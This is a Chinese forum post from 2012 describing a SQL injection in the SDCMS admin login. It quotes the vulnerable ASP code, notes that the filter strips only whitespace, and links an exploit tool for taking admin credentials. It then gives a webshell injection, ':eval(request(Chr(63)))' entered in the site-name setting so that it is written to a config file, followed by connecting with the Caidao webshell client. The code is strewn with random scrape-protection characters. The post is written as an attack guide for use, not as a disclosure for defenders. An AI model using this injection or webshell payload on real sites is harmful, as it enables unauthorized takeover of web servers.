作者:T00LS 鬼哥
, P9 f: K7 ~+ l1 {5 U$ y0 ~漏洞文件:后台目录/index.asp" B) u/ d1 D+ y0 R9 j* C
0 ?" E0 @( ~+ Q9 o+ y8 Y! {Sub Check
7 C1 g$ J1 I5 X& w Dim username,password,code,getcode,Rs
3 S- [5 S0 L; c! W3 b; P- X IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub9 p! \/ R3 G1 ^3 T. k* y4 J6 A
username=FilterText(Trim(Request.Form("username")),1)
9 O& w/ |. N/ N" m password=FilterText(Trim(Request.Form("password")),1); T% o0 ?! O( A9 L5 h
code=Trim(Request.Form("yzm"))1 U2 g; d6 P% o
getcode=Session("SDCMSCode")
2 K: X, v2 J/ O4 B2 Y5 N7 @* h& v IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died) P# Q. A# P0 [: N$ o
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
. A q% u6 P: F$ ^' Q" C! E: Z; g IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
6 S, W# A1 w0 A1 Z+ w8 S- U IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
) y0 `0 v$ N, }: c0 H IF username="" or password="" Then* m! Q8 S/ i( Q+ v
Echo "用户名或密码不能为空"ied C' W+ ^3 I) t' ]/ e
Else
8 y8 T& M6 [( i7 W$ ] Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
( \+ z$ N$ B3 s* }; Q3 |7 [ IF Rs.Eof Then
+ P( X- v' j( O+ ~ AddLog username,GetIp,"登录失败",1" x/ r# q$ b. P2 m* Y
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
5 v7 x" j* Z9 }% y3 |8 q- z* ^3 N% y Else% Y# o# @2 u0 i$ y- Y
Add_Cookies "sdcms_id",Rs(0)6 n: b! o* C. `: t, {0 E k- \
Add_Cookies "sdcms_name",username* n( L9 ]$ G) e* B3 X9 @
Add_Cookies "sdcms_pwd",Rs(2)* s' H* Q$ }0 H, y2 L5 Y
Add_Cookies "sdcms_admin",Rs(3)5 ~. K) [) ]! B4 V! ?8 C* _6 l- B6 ~# P
Add_Cookies "sdcms_alllever",Rs(4)
( e8 e x. [- i. V Add_Cookies "sdcms_infolever",Rs(5)! b) w; z& z' `3 k. l$ ?
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")' }# S' X7 b* Q" L
AddLog username,GetIp,"登录成功",1
3 M- z% M" n5 e% H5 {4 S '自动删除30天前的Log记录6 a3 X( N g$ d5 B+ c$ o; {9 S3 [
IF Sdcms_DataType Then
4 c2 T+ Q1 J6 Z Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")3 o, k7 H( O0 [
Else
$ m* H# T& @4 l ] Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
5 g2 @6 g: N. o- A) C+ J6 K End IF
3 @& l9 ~, F$ _ Go("sdcms_index.asp")
5 U- }4 U Y7 d- F End IF# l- P3 g# R1 k4 i% E" \
Rs.Close2 Q7 j! Z0 m! c( j% z1 U7 }
Set Rs=Nothing
% s! C* g# R. J End IF( V m$ p3 m# W( d$ e4 B% g/ W
End Sub! r$ b2 _. g$ s8 ~; \/ f
: o9 J) D( _, d
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码5 V- f9 _* R2 H: ~. J, C. \$ B) m" ^
/ s& S4 e5 g4 s# z/ vFunction FilterText(ByVal t0,ByVal t1)
# ?6 v- y( X/ W IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
. K! R" x8 j g" e" k: i9 D t0=Trim(t0)4 h* Y# o$ o- ~5 x
Select Case t1
3 f; h' c5 j: t- t" ~: x3 ? Case "1"
2 j" @! a$ ?% ^2 N) Y; q t0=Replace(t0,Chr(32),""); y5 r+ O# O: T! ]8 l, ~
t0=Replace(t0,Chr(13),"")
! t2 \* q& R/ x5 H- ]7 k: s t0=Replace(t0,Chr(10)&Chr(10),"")& V: \# A# V1 m+ | W
t0=Replace(t0,Chr(10),"")
9 A \& e9 P! b* G Case "2"
* K8 X1 l# q1 O+ n, l- i t0=Replace(t0,Chr(8),"")'回格 G0 ^" m& i* ^. {. H# [, [1 r
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
+ Q7 l5 |" u* J, X) E: v+ U. ]$ m t0=Replace(t0,Chr(10),"")'换行5 r" }6 P( B$ j) B( `; c: X
t0=Replace(t0,Chr(11),"")'tab(垂直制表符); O5 i! ^ Q' y% p+ r
t0=Replace(t0,Chr(12),"")'换页
1 L: Q5 A& R1 E- H8 J t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合( V! M* d) V' G4 `. l7 D
t0=Replace(t0,Chr(22),"") ^5 `3 d4 d+ b' Q+ t
t0=Replace(t0,Chr(32),"")'空格 SPACE
+ P: j0 t5 Q& ]/ o2 Q* L t0=Replace(t0,Chr(33),"")'!
6 A$ o9 d- J- A) ]! j9 E t0=Replace(t0,Chr(34),"")'"
* o1 w! V$ V" [, }% ^ t0=Replace(t0,Chr(35),"")'#. B* r2 u6 I6 m7 y8 G8 U
t0=Replace(t0,Chr(36),"")'$5 t4 v" T$ |7 {& K$ I9 T
t0=Replace(t0,Chr(37),"")'%) \1 O |) y2 e. h$ O
t0=Replace(t0,Chr(38),"")'&4 L+ B2 H2 `- V: K
t0=Replace(t0,Chr(39),"")''
/ l! s4 J9 F- n) E1 P7 P t0=Replace(t0,Chr(40),"")'(
9 d9 N% `& f5 G! g, T: | t0=Replace(t0,Chr(41),"")')2 A5 {2 C# |- V' L; O' w
t0=Replace(t0,Chr(42),"")'*4 `) @8 }- l" C w7 ]
t0=Replace(t0,Chr(43),"")'+0 j: }2 H; r) _9 F6 _$ d
t0=Replace(t0,Chr(44),"")',8 q4 p' |, A: d H, F
t0=Replace(t0,Chr(45),"")'-
8 e% J7 q8 s* B( L3 D t0=Replace(t0,Chr(46),"")'.
- V, S( R2 f. N+ g% |' i% J( a t0=Replace(t0,Chr(47),"")'/
/ v. Y6 W2 O8 | t0=Replace(t0,Chr(58),"")':+ w4 ^. n+ q. W- N* w
t0=Replace(t0,Chr(59),"")';( ?' ~- V# r- v" U
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
, M3 q* q6 D- C5 f, _& r$ M% V t0=Replace(t0,Chr(63),"")'?* a, W2 B! y4 B' ^3 o2 c
t0=Replace(t0,Chr(64),"")'@2 a0 D* s" _1 H
t0=Replace(t0,Chr(91),"")'\7 J# d5 I7 A; ?4 [* w k1 `
t0=Replace(t0,Chr(92),"")'\! n8 V; A7 c) t7 g, o, l, f
t0=Replace(t0,Chr(93),"")']3 U3 j# R* P% m+ t* n/ l( i
t0=Replace(t0,Chr(94),"")'^) P& e% K: ]. j5 K3 X0 O6 q% r$ H
t0=Replace(t0,Chr(95),"")'_
( J# F0 a# D r' S t0=Replace(t0,Chr(96),"")'`
) M+ ^% S) x1 D0 P1 j t0=Replace(t0,Chr(123),"")'{8 M9 O6 F0 z+ W
t0=Replace(t0,Chr(124),"")'|: `) c+ X, ]/ E6 Z7 k: P
t0=Replace(t0,Chr(125),"")'}
' e- j& `" n; H$ C' d/ J t0=Replace(t0,Chr(126),"")'~) L7 [; Y8 n6 \4 g- e: e: Y
Case Else
: p# o8 Y5 z/ s. x' _4 a t0=Replace(t0, "&", "&")) a7 ^1 [* w. u) a1 W; F
t0=Replace(t0, "'", "'")
' u- ?8 R8 H5 n: C$ Y) I$ S) { t0=Replace(t0, """", """)
4 {7 E2 n e$ [3 Z) \$ K* i t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
3 K) g/ k b) {5 y; j- y. J) Q End Select" d" x$ M @7 n: D
IF Instr(Lcase(t0),"expression")>0 Then
. A4 S) F8 l% o$ v/ y, G; f t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
4 w; o9 w3 P6 |+ j4 y' O' S: N5 L End If
5 ^5 ~- W2 e1 x' p FilterText=t0
, `; [6 ? u+ B. u- {& P' a: DEnd Function
$ K/ s- L( P3 |$ r' E( j, p* \
) P" R8 E% B6 ]& h* s看到没。直接参数是1 只过滤! z" u8 |! n( b' m/ e
t0=Replace(t0,Chr(32)," "). b/ R0 t9 d7 C6 m3 C
t0=Replace(t0,Chr(13),"")
1 o! y* d4 t- K$ \7 Z1 K0 r' S4 O% H+ y& g t0=Replace(t0,Chr(10)&Chr(10),"1 k' r2 L+ N. G) N$ h
")
* w0 x) E6 C9 V/ z: w t0=Replace(t0,Chr(10),"
1 C2 ?7 B2 ^* v# t4 p- t) V")
+ F8 X9 s2 a, w* v" [1 t( Q) e漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
9 y! w$ y1 k# P YEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP- }7 d' C! |6 k6 A, r& r
& |1 c8 B4 [ Y" Q; p% t& O7 V测试:1 A* j0 v0 c0 b b
; k* W, R6 Y* \. j/ c
" X' a5 h; R# V. B
现在输入工具上验证码,然后点OK( w0 g* Q9 a/ k1 b4 ^# s3 T
, n8 n* q E2 u* b* @: R5 x6 o
* \! Q: u8 ?% {* }看到我们直接进入后台管理界面了,呵呵!3 R% G/ y1 @0 I+ @
# B! Y; b2 T% f+ V$ H5 X
" W+ s; k. t% n% z! O
0 v3 k) V5 H. a5 z M" q9 a这样直接进入后台了。。。。; T( S t3 _& a8 |5 s N
7 ]2 ^3 Q& @3 y/ Q
$ n$ K; m+ j4 T h4 j# u: C- H! W6 a K; g% ?' u, m% U& H% [
SDCMS提权:
# ~' e2 R+ T' C# I/ _
2 B* N8 z8 |# X' C7 I6 o, @方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?, K! [$ R9 K/ Q: \' P
@" \4 O1 H8 e$ s2 L9 g9 k
. i, P/ g1 D: ~" Z, E0 S1 q+ f+ a: ~- G
OK,现在用菜刀连接下!
& m; V! p' j& c$ k. H- W2 T5 h- x9 c& s+ E5 M3 r' G
+ L- H" ~: x2 e# M' I
! R V6 q) J& @4 k7 ^. W( e
3 @/ H8 j" o1 }. H% V' i4 u) u% ]
- u! I4 n4 u" I# G" K! {
|
发表于 2012-11-9 20:57:02
收藏
支持
反对